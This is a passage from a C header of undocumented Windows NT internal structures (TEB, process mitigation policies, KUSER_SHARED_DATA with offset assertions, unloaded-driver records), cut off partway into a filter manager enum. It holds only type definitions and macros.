CurrentLocale;\n ULONG FpSoftwareStatusRegister;\n PVOID ReservedForDebuggerInstrumentation[16];\n#ifdef _WIN64\n PVOID SystemReserved1[30];\n#else\n PVOID SystemReserved1[26];\n#endif\n\n CHAR PlaceholderCompatibilityMode;\n BOOLEAN PlaceholderHydrationAlwaysExplicit;\n CHAR PlaceholderReserved[10];\n\n ULONG ProxiedProcessId;\n ACTIVATION_CONTEXT_STACK ActivationStack;\n\n UCHAR WorkingOnBehalfTicket[8];\n NTSTATUS ExceptionCode;\n\n PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;\n ULONG_PTR InstrumentationCallbackSp;\n ULONG_PTR InstrumentationCallbackPreviousPc;\n ULONG_PTR InstrumentationCallbackPreviousSp;\n#ifdef _WIN64\n ULONG TxFsContext;\n#endif\n\n BOOLEAN InstrumentationCallbackDisabled;\n#ifdef _WIN64\n BOOLEAN UnalignedLoadStoreExceptions;\n#endif\n#ifndef _WIN64\n UCHAR SpareBytes[23];\n ULONG TxFsContext;\n#endif\n GDI_TEB_BATCH GdiTebBatch;\n CLIENT_ID RealClientId;\n HANDLE GdiCachedProcessHandle;\n ULONG GdiClientPID;\n ULONG GdiClientTID;\n PVOID GdiThreadLocalInfo;\n ULONG_PTR Win32ClientInfo[62];\n PVOID glDispatchTable[233];\n ULONG_PTR glReserved1[29];\n PVOID glReserved2;\n PVOID glSectionInfo;\n PVOID glSection;\n PVOID glTable;\n PVOID glCurrentRC;\n PVOID glContext;\n\n NTSTATUS LastStatusValue;\n UNICODE_STRING StaticUnicodeString;\n WCHAR StaticUnicodeBuffer[261];\n\n PVOID DeallocationStack;\n PVOID TlsSlots[64];\n LIST_ENTRY TlsLinks;\n\n PVOID Vdm;\n PVOID ReservedForNtRpc;\n PVOID DbgSsReserved[2];\n\n ULONG HardErrorMode;\n#ifdef _WIN64\n PVOID Instrumentation[11];\n#else\n PVOID Instrumentation[9];\n#endif\n GUID ActivityId;\n\n PVOID SubProcessTag;\n PVOID PerflibData;\n PVOID EtwTraceData;\n PVOID WinSockData;\n ULONG GdiBatchCount;\n\n union\n {\n PROCESSOR_NUMBER CurrentIdealProcessor;\n ULONG IdealProcessorValue;\n struct\n {\n UCHAR ReservedPad0;\n UCHAR ReservedPad1;\n UCHAR ReservedPad2;\n UCHAR IdealProcessor;\n };\n };\n\n ULONG GuaranteedStackBytes;\n PVOID ReservedForPerf;\n PVOID ReservedForOle; // tagSOleTlsData\n ULONG WaitingOnLoaderLock;\n PVOID SavedPriorityState;\n ULONG_PTR ReservedForCodeCoverage;\n PVOID ThreadPoolData;\n PVOID* TlsExpansionSlots;\n#ifdef _WIN64\n PVOID DeallocationBStore;\n PVOID BStoreLimit;\n#endif\n ULONG MuiGeneration;\n ULONG IsImpersonating;\n PVOID NlsCache;\n PVOID pShimData;\n ULONG HeapData;\n HANDLE CurrentTransactionHandle;\n PTEB_ACTIVE_FRAME ActiveFrame;\n PVOID FlsData;\n\n PVOID PreferredLanguages;\n PVOID UserPrefLanguages;\n PVOID MergedPrefLanguages;\n ULONG MuiImpersonation;\n\n union\n {\n USHORT CrossTebFlags;\n USHORT SpareCrossTebBits : 16;\n };\n union\n {\n USHORT SameTebFlags;\n struct\n {\n USHORT SafeThunkCall : 1;\n USHORT InDebugPrint : 1;\n USHORT HasFiberData : 1;\n USHORT SkipThreadAttach : 1;\n USHORT WerInShipAssertCode : 1;\n USHORT RanProcessInit : 1;\n USHORT ClonedThread : 1;\n USHORT SuppressDebugMsg : 1;\n USHORT DisableUserStackWalk : 1;\n USHORT RtlExceptionAttached : 1;\n USHORT InitialThread : 1;\n USHORT SessionAware : 1;\n USHORT LoadOwner : 1;\n USHORT LoaderWorker : 1;\n USHORT SkipLoaderInit : 1;\n USHORT SkipFileAPIBrokering : 1;\n };\n };\n\n PVOID TxnScopeEnterCallback;\n PVOID TxnScopeExitCallback;\n PVOID TxnScopeContext;\n ULONG LockCount;\n LONG WowTebOffset;\n PVOID ResourceRetValue;\n PVOID ReservedForWdf;\n ULONGLONG ReservedForCrt;\n GUID EffectiveContainerId;\n ULONGLONG LastSleepCounter;\n ULONG SpinCallCount;\n ULONGLONG ExtendedFeatureDisableMask;\n} TEB, * PTEB;\n\ntypedef struct _PROCESS_DEVICEMAP_INFORMATION {\n union {\n struct {\n HANDLE DirectoryHandle;\n } Set;\n struct {\n ULONG DriveMap;\n UCHAR DriveType[32];\n } Query;\n };\n} PROCESS_DEVICEMAP_INFORMATION, *PPROCESS_DEVICEMAP_INFORMATION;\n\n__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }\n\n/*\n** PEB/TEB END\n*/\n\n/*\n** MITIGATION POLICY START\n*/\n\n//redefine enum\n\n#define ProcessDEPPolicy 0\n#define ProcessASLRPolicy 1\n#define ProcessDynamicCodePolicy 2\n#define ProcessStrictHandleCheckPolicy 3\n#define ProcessSystemCallDisablePolicy 4\n#define ProcessMitigationOptionsMask 5\n#define ProcessExtensionPointDisablePolicy 6\n#define ProcessControlFlowGuardPolicy 7\n#define ProcessSignaturePolicy 8\n#define ProcessFontDisablePolicy 9\n#define ProcessImageLoadPolicy 10\n#define ProcessSystemCallFilterPolicy 11\n#define ProcessPayloadRestrictionPolicy 12\n#define ProcessChildProcessPolicy 13\n#define ProcessSideChannelIsolationPolicy 14\n#define ProcessUserShadowStackPolicy 15\n#define ProcessRedirectionTrustPolicy 16\n#define ProcessUserPointerAuthPolicy 17\n#define ProcessSEHOPPolicy 18\n\ntypedef struct tagPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD MicrosoftSignedOnly : 1;\n DWORD StoreSignedOnly : 1;\n DWORD MitigationOptIn : 1;\n DWORD AuditMicrosoftSignedOnly : 1;\n DWORD AuditStoreSignedOnly : 1;\n DWORD ReservedFlags : 27;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10, *PPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD ProhibitDynamicCode : 1;\n DWORD AllowThreadOptOut : 1;\n DWORD AllowRemoteDowngrade : 1;\n DWORD AuditProhibitDynamicCode : 1;\n DWORD ReservedFlags : 28;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10, *PPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD EnableControlFlowGuard : 1;\n DWORD EnableExportSuppression : 1;\n DWORD StrictMode : 1;\n DWORD EnableXfg : 1;\n DWORD EnableXfgAuditMode : 1;\n DWORD ReservedFlags : 27;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10, *PPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD DisableNonSystemFonts : 1;\n DWORD AuditNonSystemFontLoading : 1;\n DWORD ReservedFlags : 30;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD NoRemoteImages : 1;\n DWORD NoLowMandatoryLabelImages : 1;\n DWORD PreferSystem32Images : 1;\n DWORD AuditNoRemoteImages : 1;\n DWORD AuditNoLowMandatoryLabelImages : 1;\n DWORD ReservedFlags : 27;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10, *PPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 {\n union {\n ULONG Flags;\n struct {\n ULONG FilterId : 4;\n ULONG ReservedFlags : 28;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 {\n union {\n ULONG Flags;\n struct {\n ULONG EnableExportAddressFilter : 1;\n ULONG AuditExportAddressFilter : 1;\n ULONG EnableExportAddressFilterPlus : 1;\n ULONG AuditExportAddressFilterPlus : 1;\n ULONG EnableImportAddressFilter : 1;\n ULONG AuditImportAddressFilter : 1;\n ULONG EnableRopStackPivot : 1;\n ULONG AuditRopStackPivot : 1;\n ULONG EnableRopCallerCheck : 1;\n ULONG AuditRopCallerCheck : 1;\n ULONG EnableRopSimExec : 1;\n ULONG AuditRopSimExec : 1;\n ULONG ReservedFlags : 20;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10, *PPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 {\n union {\n ULONG Flags;\n struct {\n ULONG NoChildProcessCreation : 1;\n ULONG AuditNoChildProcessCreation : 1;\n ULONG AllowSecureProcessCreation : 1;\n ULONG ReservedFlags : 29;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD SmtBranchTargetIsolation : 1;\n DWORD IsolateSecurityDomain : 1;\n DWORD DisablePageCombine : 1;\n DWORD SpeculativeStoreBypassDisable : 1;\n DWORD ReservedFlags : 28;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10, *PPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD DisallowWin32kSystemCalls : 1;\n DWORD AuditDisallowWin32kSystemCalls : 1;\n DWORD DisallowFsctlSystemCalls : 1;\n DWORD AuditDisallowFsctlSystemCalls : 1;\n DWORD ReservedFlags : 28;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD EnableUserShadowStack : 1;\n DWORD AuditUserShadowStack : 1;\n DWORD SetContextIpValidation : 1;\n DWORD AuditSetContextIpValidation : 1;\n DWORD EnableUserShadowStackStrictMode : 1;\n DWORD BlockNonCetBinaries : 1;\n DWORD BlockNonCetBinariesNonEhcont : 1;\n DWORD AuditBlockNonCetBinaries : 1;\n DWORD CetDynamicApisOutOfProcOnly : 1;\n DWORD ReservedFlags : 23;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10, * PPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 {\n union {\n DWORD Flags;\n struct {\n DWORD EnforceRedirectionTrust : 1;\n DWORD AuditRedirectionTrust : 1;\n DWORD ReservedFlags : 30;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10, * PPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10;\n\ntypedef struct _PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11 {\n union {\n ULONG Flags;\n struct {\n ULONG EnablePointerAuthUserIp : 1;\n ULONG ReservedFlags : 31;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11, * PPROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11;\n\ntypedef struct _PROCESS_MITIGATION_SEHOP_POLICY_W11 {\n union {\n ULONG Flags;\n struct {\n ULONG EnableSehop : 1;\n ULONG ReservedFlags : 31;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_SEHOP_POLICY_W11, * PPROCESS_MITIGATION_SEHOP_POLICY_W11;\n\ntypedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {\n PROCESS_MITIGATION_POLICY Policy;\n union\n {\n PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy;\n PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy;\n PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 SystemCallDisablePolicy;\n PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy;\n PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 DynamicCodePolicy;\n PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 ControlFlowGuardPolicy;\n PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 SignaturePolicy;\n PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 FontDisablePolicy;\n PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 ImageLoadPolicy;\n PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 SystemCallFilterPolicy;\n PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 PayloadRestrictionPolicy;\n PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy;\n PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 SideChannelIsolationPolicy;\n PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 UserShadowStackPolicy;\n PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 RedirectionTrustPolicy;\n PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11 UserPointerAuthPolicy;\n PROCESS_MITIGATION_SEHOP_POLICY_W11 SEHOPPolicy;\n };\n} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION;\n\n/*\n** MITIGATION POLICY END\n*/\n\n/*\n** KUSER_SHARED_DATA START\n*/\n#define NX_SUPPORT_POLICY_ALWAYSOFF 0\n#define NX_SUPPORT_POLICY_ALWAYSON 1\n#define NX_SUPPORT_POLICY_OPTIN 2\n#define NX_SUPPORT_POLICY_OPTOUT 3\n\n#define SEH_VALIDATION_POLICY_ON 0\n#define SEH_VALIDATION_POLICY_OFF 1\n#define SEH_VALIDATION_POLICY_TELEMETRY 2\n#define SEH_VALIDATION_POLICY_DEFER 3\n\n#include \ntypedef struct _KSYSTEM_TIME {\n ULONG LowPart;\n LONG High1Time;\n LONG High2Time;\n} KSYSTEM_TIME, *PKSYSTEM_TIME;\n#include \n\ntypedef enum _NT_PRODUCT_TYPE {\n NtProductWinNt = 1,\n NtProductLanManNt,\n NtProductServer\n} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;\n\n#define PROCESSOR_FEATURE_MAX 64\n\ntypedef enum _ALTERNATIVE_ARCHITECTURE_TYPE {\n StandardDesign, // None == 0 == standard design\n NEC98x86, // NEC PC98xx series on X86\n EndAlternatives // past end of known alternatives\n} ALTERNATIVE_ARCHITECTURE_TYPE;\n\n//\n// Define Address of User Shared Data\n//\n#define MM_SHARED_USER_DATA_VA 0x000000007FFE0000\n\n//\n// WARNING: this definition is OS version dependent.\n// Structure maybe incomplete.\n//\n#include \ntypedef struct _KUSER_SHARED_DATA {\n\n ULONG TickCountLowDeprecated;\n ULONG TickCountMultiplier;\n\n volatile KSYSTEM_TIME InterruptTime;\n volatile KSYSTEM_TIME SystemTime;\n volatile KSYSTEM_TIME TimeZoneBias;\n\n USHORT ImageNumberLow;\n USHORT ImageNumberHigh;\n\n WCHAR NtSystemRoot[260];\n\n ULONG MaxStackTraceDepth;\n ULONG CryptoExponent;\n ULONG TimeZoneId;\n ULONG LargePageMinimum;\n\n union {\n ULONG Reserved2[7];\n struct {\n ULONG AitSamplingValue;\n ULONG AppCompatFlag;\n struct {\n ULONG LowPart;\n ULONG HighPart;\n } RNGSeedVersion;\n ULONG GlobalValidationRunlevel;\n LONG TimeZoneBiasStamp;\n ULONG NtBuildNumber;\n };\n };\n\n NT_PRODUCT_TYPE NtProductType;\n BOOLEAN ProductTypeIsValid;\n UCHAR Reserved0[1];\n USHORT NativeProcessorArchitecture;\n\n ULONG NtMajorVersion;\n ULONG NtMinorVersion;\n\n BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];\n ULONG Reserved1;\n ULONG Reserved3;\n volatile ULONG TimeSlip;\n ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;\n ULONG BootId; //previously AltArchitecturePad\n LARGE_INTEGER SystemExpirationDate;\n ULONG SuiteMask;\n BOOLEAN KdDebuggerEnabled;\n\n union {\n UCHAR MitigationPolicies;\n struct {\n UCHAR NXSupportPolicy : 2;\n UCHAR SEHValidationPolicy : 2;\n UCHAR CurDirDevicesSkippedForDlls : 2;\n UCHAR Reserved : 2;\n };\n };\n\n UCHAR Reserved6[2];\n\n volatile ULONG ActiveConsoleId;\n volatile ULONG DismountCount;\n ULONG ComPlusPackage;\n ULONG LastSystemRITEventTickCount;\n ULONG NumberOfPhysicalPages;\n BOOLEAN SafeBootMode;\n UCHAR VirtualizationFlags;\n UCHAR Reserved12[2];\n\n union {\n ULONG SharedDataFlags;\n struct {\n ULONG DbgErrorPortPresent : 1;\n ULONG DbgElevationEnabled : 1;\n ULONG DbgVirtEnabled : 1;\n ULONG DbgInstallerDetectEnabled : 1;\n ULONG DbgLkgEnabled : 1;\n ULONG DbgDynProcessorEnabled : 1;\n ULONG DbgConsoleBrokerEnabled : 1;\n ULONG DbgSecureBootEnabled : 1;\n ULONG DbgMultiSessionSku : 1;\n ULONG DbgMultiUsersInSessionSku : 1;\n ULONG DbgStateSeparationEnabled : 1;\n ULONG DbgSplitTokenEnabled : 1;\n ULONG DbgShadowAdminEnabled : 1;\n ULONG SpareBits : 19;\n };\n };\n ULONG DataFlagsPad[1];\n ULONGLONG TestRetInstruction;\n LONGLONG QpcFrequency;\n\n ULONG SystemCall;\n ULONG SystemCallPad0;\n\n ULONGLONG SystemCallPad[2];\n\n union {\n volatile KSYSTEM_TIME TickCount;\n volatile ULONG64 TickCountQuad;\n struct {\n ULONG ReservedTickCountOverlay[3];\n ULONG TickCountPad[1];\n };\n };\n\n ULONG Cookie;\n ULONG CookiedPad[1];\n\n LONGLONG ConsoleSessionForegroundProcessId;\n\n ULONGLONG TimeUpdateLock;\n ULONGLONG BaselineSystemTimeQpc;\n ULONGLONG BaselineInterruptTimeQpc;\n ULONGLONG QpcSystemTimeIncrement;\n ULONGLONG QpcInterruptTimeIncrement;\n UCHAR QpcSystemTimeIncrementShift;\n UCHAR QpcInterruptTimeIncrementShift;\n USHORT UnparkedProcessorCount;\n\n ULONG EnclaveFeatureMask[4];\n union {\n ULONG Reserved8;\n ULONG TelemetryCoverageRound;\n };\n\n USHORT UserModeGlobalLogger[16];\n\n ULONG ImageFileExecutionOptions;\n ULONG LangGenerationCount;\n ULONGLONG Reserved4;\n\n volatile ULONG64 InterruptTimeBias;\n volatile ULONG64 QpcBias;\n\n ULONG ActiveProcessorCount;\n volatile UCHAR ActiveGroupCount;\n UCHAR Reserved9;\n\n union {\n USHORT QpcData;\n struct {\n UCHAR QpcBypassEnabled : 1;\n UCHAR QpcShift : 1;\n };\n };\n\n LARGE_INTEGER TimeZoneBiasEffectiveStart;\n LARGE_INTEGER TimeZoneBiasEffectiveEnd;\n\n XSTATE_CONFIGURATION XState;\n\n KSYSTEM_TIME FeatureConfigurationChangeStamp;\n ULONG Spare;\n\n ULONG64 UserPointerAuthMask;\n\n ULONG InternsReserved[210];\n\n} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;\n#include \n\n#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)\n\n#if !defined(__midl) && !defined(MIDL_PASS)\n\n//\n// The overall size can change, but it must be the same for all architectures.\n//\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountLowDeprecated) == 0x0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountMultiplier) == 0x4);\nC_ASSERT(__alignof(KSYSTEM_TIME) == 4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTime) == 0x08);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemTime) == 0x014);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBias) == 0x020);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberLow) == 0x02c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberHigh) == 0x02e);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtSystemRoot) == 0x030);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MaxStackTraceDepth) == 0x238);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, CryptoExponent) == 0x23c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneId) == 0x240);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LargePageMinimum) == 0x244);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AitSamplingValue) == 0x248);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AppCompatFlag) == 0x24c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, RNGSeedVersion) == 0x250);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, GlobalValidationRunlevel) == 0x258);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasStamp) == 0x25c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtBuildNumber) == 0x260);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtProductType) == 0x264);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProductTypeIsValid) == 0x268);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NativeProcessorArchitecture) == 0x26a);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMajorVersion) == 0x26c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMinorVersion) == 0x270);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProcessorFeatures) == 0x274);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved1) == 0x2b4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved3) == 0x2b8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeSlip) == 0x2bc);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AlternativeArchitecture) == 0x2c0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemExpirationDate) == 0x2c8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SuiteMask) == 0x2d0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, KdDebuggerEnabled) == 0x2d4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MitigationPolicies) == 0x2d5);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveConsoleId) == 0x2d8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, DismountCount) == 0x2dc);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ComPlusPackage) == 0x2e0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LastSystemRITEventTickCount) == 0x2e4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NumberOfPhysicalPages) == 0x2e8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SafeBootMode) == 0x2ec);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, VirtualizationFlags) == 0x2ed);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved12) == 0x2ee);\n\n#if defined(_MSC_EXTENSIONS)\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SharedDataFlags) == 0x2f0);\n\n#endif\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TestRetInstruction) == 0x2f8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcFrequency) == 0x300);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCall) == 0x308);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad0) == 0x30c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad) == 0x310);\n\n#if defined(_MSC_EXTENSIONS)\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCount) == 0x320);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountQuad) == 0x320);\n\n#endif\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Cookie) == 0x330);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ConsoleSessionForegroundProcessId) == 0x338);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeUpdateLock) == 0x340);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineSystemTimeQpc) == 0x348);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineInterruptTimeQpc) == 0x350);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrement) == 0x358);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrement) == 0x360);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrementShift) == 0x368);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrementShift) == 0x369);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UnparkedProcessorCount) == 0x36a);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, EnclaveFeatureMask) == 0x36c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved8) == 0x37c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UserModeGlobalLogger) == 0x380);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageFileExecutionOptions) == 0x3a0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LangGenerationCount) == 0x3a4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved4) == 0x3a8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTimeBias) == 0x3b0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcBias) == 0x3b8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveProcessorCount) == 0x3c0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveGroupCount) == 0x3c4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved9) == 0x3c5);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcData) == 0x3c6);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveStart) == 0x3c8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveEnd) == 0x3d0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, XState) == 0x3d8);\n\n#endif /* __midl | MIDL_PASS */\n\n/*\n** KUSER_SHARED_DATA END\n*/\n\n/*\n** MM UNLOADED DRIVERS START\n*/\n\ntypedef struct _UNLOADED_DRIVERS {\n UNICODE_STRING Name;\n PVOID StartAddress;\n PVOID EndAddress;\n LARGE_INTEGER CurrentTime;\n} UNLOADED_DRIVERS, *PUNLOADED_DRIVERS;\n\n#define MI_UNLOADED_DRIVERS 50\n\n/*\n** MM UNLOADED DRIVERS END\n*/\n\n\n/*\n** FLT MANAGER START\n*/\ntypedef enum _FLT_FILTER_FLAGS {\n FLTFL_MANDATORY_UNLOAD_IN_PROGRESS = 1,\n FLTFL_FILTERING_INITIATED = 2,\n FLTFL_NAME_PROVIDER = 4,\n FLTFL_SUPPORTS_PIPES_MAILSLOTS = 8,\n FLTFL_BACKED_BY_PAGEFILE = 16,\n 